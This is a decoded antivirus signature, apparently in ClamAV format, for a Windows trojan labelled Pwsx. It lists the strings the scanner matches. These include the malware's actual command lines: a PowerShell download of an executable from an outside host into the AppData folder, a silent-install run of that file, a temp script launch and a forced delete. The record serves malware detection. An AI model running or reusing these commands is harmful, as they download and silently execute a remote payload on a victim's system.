VIRUS NAME: Win.Trojan.Pwsx-9943725-0
TDB: Engine:51-255,Target:1
LOGICAL EXPRESSION: (0|1|2|3|4)>3,4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
powershell.exe Invoke-WebRequest -Uri https://rss.fbvidcdn.com/dl/seed/ -OutFile '%appdata%\s-installer.exe'
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cmd.exe /c "%temp%\config.cmd"
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
C:\Users\OS\Desktop\scseed\Release\scseed.pdb
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
"%appdata%\s-installer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
del /F /Q "%appdata%\s-installer.exe"
